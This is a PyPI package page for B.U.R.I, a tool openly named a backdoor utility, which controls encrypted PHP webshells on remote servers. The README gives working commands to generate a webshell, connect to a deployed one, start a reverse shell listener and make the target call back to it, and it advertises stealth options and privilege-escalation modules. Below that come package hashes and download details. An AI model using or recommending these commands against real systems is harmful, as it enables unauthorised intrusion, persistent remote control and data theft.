B.U.R.I (Backdoor Utility for Remote Interaction) is a modular, encrypted command-and-control (C2) webshell client designed for secure and interactive remote administration. It provides a feature-rich interface for managing remote systems via an encrypted PHP webshell, supporting AES-GCM encryption, reverse shell capabilities, and extensible command modules.
Project description
B.U.R.I (Backdoor Utility for Remote Interaction) is a modular, encrypted command-and-control (C2) webshell client designed for secure and interactive remote administration. It provides a feature-rich interface for managing remote systems via an encrypted PHP webshell, supporting AES-GCM encryption, reverse shell capabilities, and extensible command modules.
Features
- Encrypted Communication: Uses AES-GCM for secure client-server communication.
- Interactive Shell: Rich terminal UI with auto-completion, history, and syntax highlighting powered by
richandprompt_toolkit. - Modular Design: Extensible command modules for custom functionality (e.g., file upload/download, privilege escalation).
- Reverse Shell Support: Built-in listener for reverse shell connections.
- Cross-Platform: Supports both Linux and Windows targets with dynamic environment detection.
- Stealth Options: Customizable POST parameters and proxy support for enhanced discretion.
- Path Autocompletion: Remote path completion using
lsfor efficient navigation.
Installation
pip install buri-tod
Usage
B.U.R.I supports three main modes: creating a webshell, running an interactive session, and listening for reverse shells.
1. Create a Webshell
Generate an encrypted PHP webshell:
buri create --path shell.php --password 'SuperSecretPass123'
This creates a PHP webshell at shell.php with the specified password for encryption.
2. Run an Interactive Session
Connect to a deployed webshell:
buri run https://example.com/shell.php -p 'SuperSecretPass123' --param 'data'
--param: Specify the POST parameter name (default:data).--proxy: Optional proxy (e.g.,http://127.0.0.1:8080).
3. Start a Reverse Shell Listener
Listen for incoming reverse shell connections:
buri listen --lhost 0.0.0.0 --lport 4444
Then, from the interactive shell, initiate a reverse shell:
revshell <listener_ip> 4444
Example Commands
Once in the interactive shell:
whoami: Display the current user.cd /path/to/dir: Change the remote working directory.ls: List files in the current directory (supports autocompletion).upload /local/path /remote/path: Upload a file to the remote system.download /remote/path /local/path: Download a file from the remote system.revshell <ip> <port>: Initiate a reverse shell to the specified listener.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file buri_tod-0.7.1.tar.gz.
File metadata
- Download URL: buri_tod-0.7.1.tar.gz
- Upload date:
- Size: 15.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.13.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
891252b793e882e4bb3a1cba36ee4b3769089c96780c0da83068713a5b1617ae
|
|
| MD5 |
24030025fbbf51088b5fca945525b515
|
|
| BLAKE2b-256 |
b6376e7807615d19caebf42587c66d561024b3aa20c2bdb704b2a92d78b6bd68
|
File details
Details for the file buri_tod-0.7.1-py3-none-any.whl.
File metadata
- Download URL: buri_tod-0.7.1-py3-none-any.whl
- Upload date:
- Size: 17.1 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.13.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
01ba71c026cca7f430ac6544c98c289b4a3115bb1995966d44a1c9247b21e2ad
|
|
| MD5 |
e0d27d27ddbfad36bdc0861e826ec9fa
|
|
| BLAKE2b-256 |
d8e82afcc59bbf41f083a7ccc0281c76ede1b67304d31ecf43e72b3bac700b11
|
